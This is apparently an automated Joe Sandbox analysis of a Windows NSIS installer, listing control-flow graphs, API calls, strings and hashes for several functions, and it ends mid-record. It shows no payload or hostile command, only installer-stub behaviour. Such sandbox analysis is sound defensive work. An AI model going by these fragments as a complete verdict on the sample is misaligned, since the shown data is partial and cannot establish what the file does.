                                                                                                                                                                                          control_flow_graph 307 403bf3-403c0b call 406915 310 403c0d-403c18 GetUserDefaultUILanguage call 406468 307->310 311 403c1f-403c56 call 4063ef 307->311 314 403c1d 310->314 317 403c58-403c69 call 4063ef 311->317 318 403c6e-403c74 lstrcatW 311->318 316 403c79-403ca2 call 403ec9 call 405ef8 314->316 324 403d34-403d3c call 405ef8 316->324 325 403ca8-403cad 316->325 317->318 318->316 331 403d4a-403d6f LoadImageW 324->331 332 403d3e-403d45 call 40655e 324->332 325->324 327 403cb3-403cdb call 4063ef 325->327 327->324 333 403cdd-403ce1 327->333 335 403df0-403df8 call 40140b 331->335 336 403d71-403da1 RegisterClassW 331->336 332->331 337 403cf3-403cff lstrlenW 333->337 338 403ce3-403cf0 call 405e1d 333->338 349 403e02-403e0d call 403ec9 335->349 350 403dfa-403dfd 335->350 339 403da7-403deb SystemParametersInfoW CreateWindowExW 336->339 340 403ebf 336->340 344 403d01-403d0f lstrcmpiW 337->344 345 403d27-403d2f call 405df0 call 406521 337->345 338->337 339->335 343 403ec1-403ec8 340->343 344->345 348 403d11-403d1b GetFileAttributesW 344->348 345->324 352 403d21-403d22 call 405e3c 348->352 353 403d1d-403d1f 348->353 359 403e13-403e2d ShowWindow call 4068a5 349->359 360 403e96-403e97 call 405679 349->360 350->343 352->345 353->345 353->352 365 403e39-403e4b GetClassInfoW 359->365 366 403e2f-403e34 call 4068a5 359->366 364 403e9c-403e9e 360->364 367 403ea0-403ea6 364->367 368 403eb8-403eba call 40140b 364->368 371 403e63-403e86 DialogBoxParamW call 40140b 365->371 372 403e4d-403e5d GetClassInfoW RegisterClassW 365->372 366->365 367->350 373 403eac-403eb3 call 40140b 367->373 368->340 377 403e8b-403e94 call 403b43 371->377 372->371 373->350 377->343
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                                                                                                                            • Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                                                                                                                          • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00434000,00008001), ref: 00403C0D
                                                                                                                                                                                            • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                                                                                                                          • lstrcatW.KERNEL32(1033,00422F08), ref: 00403C74
                                                                                                                                                                                          • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,00434800,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,74DF3420), ref: 00403CF4
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,00434800,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D12
                                                                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403D5B
                                                                                                                                                                                          • RegisterClassW.USER32(004289C0), ref: 00403D98
                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
                                                                                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403E1B
                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
                                                                                                                                                                                          • RegisterClassW.USER32(004289C0), ref: 00403E5D
                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                          • API String ID: 606308-572083776
                                                                                                                                                                                          • Opcode ID: 0956769c01ddca14b96dea91265e8b7d4d10852685e549966d2ead3f546cae20
                                                                                                                                                                                          • Instruction ID: 6a74b9b34ded998ebd2751605f77428bf44f11e359ee0ac59d58ca77ea789e65
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0956769c01ddca14b96dea91265e8b7d4d10852685e549966d2ead3f546cae20
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C61B770200740BAD620AF669D46F2B3A7CEB84B45F81453FF941B61E2CB7D5942CB6D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 380 403082-4030d0 GetTickCount GetModuleFileNameW call 406011 383 4030d2-4030d7 380->383 384 4030dc-40310a call 406521 call 405e3c call 406521 GetFileSize 380->384 385 4032b2-4032b6 383->385 392 403110 384->392 393 4031f5-403203 call 40301e 384->393 395 403115-40312c 392->395 400 403205-403208 393->400 401 403258-40325d 393->401 396 403130-403139 call 40349e 395->396 397 40312e 395->397 406 40325f-403267 call 40301e 396->406 407 40313f-403146 396->407 397->396 403 40320a-403222 call 4034b4 call 40349e 400->403 404 40322c-403256 GlobalAlloc call 4034b4 call 4032b9 400->404 401->385 403->401 426 403224-40322a 403->426 404->401 431 403269-40327a 404->431 406->401 410 4031c2-4031c6 407->410 411 403148-40315c call 405fcc 407->411 415 4031d0-4031d6 410->415 416 4031c8-4031cf call 40301e 410->416 411->415 429 40315e-403165 411->429 422 4031e5-4031ed 415->422 423 4031d8-4031e2 call 406a02 415->423 416->415 422->395 430 4031f3 422->430 423->422 426->401 426->404 429->415 433 403167-40316e 429->433 430->393 434 403282-403287 431->434 435 40327c 431->435 433->415 437 403170-403177 433->437 436 403288-40328e 434->436 435->434 436->436 438 403290-4032ab SetFilePointer call 405fcc 436->438 437->415 439 403179-403180 437->439 442 4032b0 438->442 439->415 441 403182-4031a2 439->441 441->401 443 4031a8-4031ac 441->443 442->385 444 4031b4-4031bc 443->444 445 4031ae-4031b2 443->445 444->415 446 4031be-4031c0 444->446 445->430 445->444 446->415
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403093
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030AF
                                                                                                                                                                                            • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
                                                                                                                                                                                            • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 004030FB
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                          • API String ID: 2803837635-2162933095
                                                                                                                                                                                          • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                                                                                                                          • Instruction ID: 0271efb430f2efbe2fca7880162b12dddab7439e54d706f300c55aed9b32fb97
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B51C071A01304ABDB209F65DD85B9E7FACAB09316F10407BF904B62D1D7789E818B5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 447 40655e-406567 448 406569-406578 447->448 449 40657a-406594 447->449 448->449 450 4067a4-4067aa 449->450 451 40659a-4065a6 449->451 453 4067b0-4067bd 450->453 454 4065b8-4065c5 450->454 451->450 452 4065ac-4065b3 451->452 452->450 456 4067c9-4067cc 453->456 457 4067bf-4067c4 call 406521 453->457 454->453 455 4065cb-4065d4 454->455 459 406791 455->459 460 4065da-40661d 455->460 457->456 461 406793-40679d 459->461 462 40679f-4067a2 459->462 463 406623-40662f 460->463 464 406735-406739 460->464 461->450 462->450 465 406631 463->465 466 406639-40663b 463->466 467 40673b-406742 464->467 468 40676d-406771 464->468 465->466 469 406675-406678 466->469 470 40663d-406663 call 4063ef 466->470 473 406752-40675e call 406521 467->473 474 406744-406750 call 406468 467->474 471 406781-40678f lstrlenW 468->471 472 406773-40677c call 40655e 468->472 478 40667a-406686 GetSystemDirectoryW 469->478 479 40668b-40668e 469->479 487 406669-406670 call 40655e 470->487 488 40671d-406720 470->488 471->450 472->471 483 406763-406769 473->483 474->483 484 406718-40671b 478->484 485 4066a0-4066a4 479->485 486 406690-40669c GetWindowsDirectoryW 479->486 483->471 489 40676b 483->489 484->488 490 40672d-406733 call 4067cf 484->490 485->484 491 4066a6-4066c4 485->491 486->485 487->484 488->490 493 406722-406728 lstrcatW 488->493 489->490 490->471 495 4066c6-4066cc 491->495 496 4066d8-4066f0 call 406915 491->496 493->490 501 4066d4-4066d6 495->501 504 4066f2-406705 SHGetPathFromIDListW CoTaskMemFree 496->504 505 406707-406710 496->505 501->496 502 406712-406716 501->502 502->484 504->502 504->505 505->491 505->502
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406680
                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 004066F4
                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
                                                                                                                                                                                          • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406728
                                                                                                                                                                                          • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                          • String ID: 47305662$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                          • API String ID: 4024019347-3285502050
                                                                                                                                                                                          • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                                                                                                                                          • Instruction ID: c1bee3e663878f3afad94de22ef935420ccf361ce06c76a1d76179cfc985cdfa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                                                                                                                                          • Instruction Fuzzy Hash: 266146B1A043019BDB205F28DD80B6B77E4AF84318F65053FF646B32D1DA7D89A18B5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 506 401774-401799 call 402dab call 405e67 511 4017a3-4017b5 call 406521 call 405df0 lstrcatW 506->511 512 40179b-4017a1 call 406521 506->512 517 4017ba-4017bb call 4067cf 511->517 512->517 521 4017c0-4017c4 517->521 522 4017c6-4017d0 call 40687e 521->522 523 4017f7-4017fa 521->523 530 4017e2-4017f4 522->530 531 4017d2-4017e0 CompareFileTime 522->531 524 401802-40181e call 406011 523->524 525 4017fc-4017fd call 405fec 523->525 533 401820-401823 524->533 534 401892-4018bb call 4055a6 call 4032b9 524->534 525->524 530->523 531->530 535 401874-40187e call 4055a6 533->535 536 401825-401863 call 406521 * 2 call 40655e call 406521 call 405b81 533->536 546 4018c3-4018cf SetFileTime 534->546 547 4018bd-4018c1 534->547 548 401887-40188d 535->548 536->521 568 401869-40186a 536->568 550 4018d5-4018e0 FindCloseChangeNotification 546->550 547->546 547->550 551 402c38 548->551 554 4018e6-4018e9 550->554 555 402c2f-402c32 550->555 556 402c3a-402c3e 551->556 558 4018eb-4018fc call 40655e lstrcatW 554->558 559 4018fe-401901 call 40655e 554->559 555->551 565 401906-4023a7 call 405b81 558->565 559->565 565->555 565->556 568->548 570 40186c-40186d 568->570 570->535
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,?,00000031), ref: 004017DA
                                                                                                                                                                                            • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                                                                                                                            • Part of subcall function 004055A6: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                                                                                                                            • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                                                                                                                            • Part of subcall function 004055A6: lstrcatW.KERNEL32(Completed,004033F2), ref: 00405601
                                                                                                                                                                                            • Part of subcall function 004055A6: SetWindowTextW.USER32(Completed,Completed), ref: 00405613
                                                                                                                                                                                            • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                                                                                                                            • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                                                                                                                            • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$open$open cmd
                                                                                                                                                                                          • API String ID: 1941528284-1391832873
                                                                                                                                                                                          • Opcode ID: fee3e7ed0ab5e121637f04a725511c5a0f25f3915fa7b28c3905e20eb0eb94be
                                                                                                                                                                                          • Instruction ID: 1777f765e23ed303a4c4324df0f40fc052c607b9e3f25272d24a03cacca2a4dc
                                                                                                                                                                                          • Opcode Fuzzy Hash: fee3e7ed0ab5e121637f04a725511c5a0f25f3915fa7b28c3905e20eb0eb94be
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E41A531900509BACF117BA9DD86DAF3AB5EF45328B20423FF512B10E1DB3C8A52966D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 572 4055a6-4055bb 573 4055c1-4055d2 572->573 574 405672-405676 572->574 575 4055d4-4055d8 call 40655e 573->575 576 4055dd-4055e9 lstrlenW 573->576 575->576 578 405606-40560a 576->578 579 4055eb-4055fb lstrlenW 576->579 581 405619-40561d 578->581 582 40560c-405613 SetWindowTextW 578->582 579->574 580 4055fd-405601 lstrcatW 579->580 580->578 583 405663-405665 581->583 584 40561f-405661 SendMessageW * 3 581->584 582->581 583->574 585 405667-40566a 583->585 584->583 585->574
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                                                                                                                          • lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                                                                                                                          • lstrcatW.KERNEL32(Completed,004033F2), ref: 00405601
                                                                                                                                                                                          • SetWindowTextW.USER32(Completed,Completed), ref: 00405613
                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                          • String ID: Completed
                                                                                                                                                                                          • API String ID: 2531174081-3087654605
                                                                                                                                                                                          • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                                                                                                                          • Instruction ID: deb6953f75989b306d4e6df0e2073f5bc52164b7b2c012b705af3b177d86a23e
                                                                                                                                                                                          • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F21B375900158BACB119FA5DD84ECFBF75EF45364F50803AF944B22A0C77A4A51CF68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 586 4032b9-4032d0 587 4032d2 586->587 588 4032d9-4032e1 586->588 587->588 589 4032e3 588->589 590 4032e8-4032ed 588->590 589->590 591 4032fd-40330a call 40349e 590->591 592 4032ef-4032f8 call 4034b4 590->592 596 403310-403314 591->596 597 403455 591->597 592->591 598 40331a-40333a GetTickCount call 406a70 596->598 599 40343e-403440 596->599 600 403457-403458 597->600 610 403494 598->610 612 403340-403348 598->612 601 403442-403445 599->601 602 403489-40348d 599->602 604 403497-40349b 600->604 605 403447 601->605 606 40344a-403453 call 40349e 601->606 607 40345a-403460 602->607 608 40348f 602->608 605->606 606->597 620 403491 606->620 613 403462 607->613 614 403465-403473 call 40349e 607->614 608->610 610->604 617 40334a 612->617 618 40334d-40335b call 40349e 612->618 613->614 614->597 622 403475-403481 call 4060c3 614->622 617->618 618->597 625 403361-40336a 618->625 620->610 629 403483-403486 622->629 630 40343a-40343c 622->630 626 403370-40338d call 406a90 625->626 632 403393-4033aa GetTickCount 626->632 633 403436-403438 626->633 629->602 630->600 634 4033f5-4033f7 632->634 635 4033ac-4033b4 632->635 633->600 638 4033f9-4033fd 634->638 639 40342a-40342e 634->639 636 4033b6-4033ba 635->636 637 4033bc-4033ed MulDiv wsprintfW call 4055a6 635->637 636->634 636->637 645 4033f2 637->645 642 403412-403418 638->642 643 4033ff-403404 call 4060c3 638->643 639->612 640 403434 639->640 640->610 644 40341e-403422 642->644 648 403409-40340b 643->648 644->626 647 403428 644->647 645->634 647->610 648->630 649 40340d-403410 648->649 649->644
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                                          • String ID: ... %d%%
                                                                                                                                                                                          • API String ID: 551687249-2449383134
                                                                                                                                                                                          • Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                                                                                                                                          • Instruction ID: 25ee467b37f7358b1d8943912f63d539eb3ef7c07a249f5ee2dc3eaa61b9464a
